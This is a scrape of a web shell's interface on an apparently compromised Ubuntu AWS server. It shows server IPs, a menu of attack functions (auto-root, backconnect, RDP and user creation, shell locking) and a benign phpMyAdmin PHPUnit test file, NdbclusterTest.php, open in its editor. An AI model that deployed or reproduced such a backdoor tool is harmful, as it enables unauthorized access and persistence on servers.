Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.140.196.3
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
tests /
unit /
Engines /
[ HOME SHELL ]
Name
Size
Permission
Action
BdbTest.php
2.19
KB
-rw-r--r--
BinlogTest.php
1.11
KB
-rw-r--r--
InnodbTest.php
9.48
KB
-rw-r--r--
MemoryTest.php
1.13
KB
-rw-r--r--
MrgMyisamTest.php
1.14
KB
-rw-r--r--
MyisamTest.php
3.77
KB
-rw-r--r--
NdbclusterTest.php
1.59
KB
-rw-r--r--
PbxtTest.php
7.86
KB
-rw-r--r--
PerformanceSchemaTest.php
1.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : NdbclusterTest.php
<?php declare(strict_types=1); namespace PhpMyAdmin\Tests\Engines; use PhpMyAdmin\DatabaseInterface; use PhpMyAdmin\Engines\Ndbcluster; use PhpMyAdmin\Tests\AbstractTestCase; use PHPUnit\Framework\Attributes\CoversClass; #[CoversClass(Ndbcluster::class)] class NdbclusterTest extends AbstractTestCase { protected Ndbcluster $object; /** * Sets up the fixture, for example, opens a network connection. * This method is called before a test is executed. */ protected function setUp(): void { parent::setUp(); DatabaseInterface::$instance = $this->createDatabaseInterface(); $this->object = new Ndbcluster('nbdcluster'); } /** * Tears down the fixture, for example, closes a network connection. * This method is called after a test is executed. */ protected function tearDown(): void { parent::tearDown(); unset($this->object); } /** * Test for getVariables */ public function testGetVariables(): void { self::assertSame( $this->object->getVariables(), ['ndb_connectstring' => []], ); } /** * Test for getVariablesLikePattern */ public function testGetVariablesLikePattern(): void { self::assertSame( $this->object->getVariablesLikePattern(), 'ndb\\_%', ); } /** * Test for getMysqlHelpPage */ public function testGetMysqlHelpPage(): void { self::assertSame( $this->object->getMysqlHelpPage(), 'ndbcluster', ); } }
Close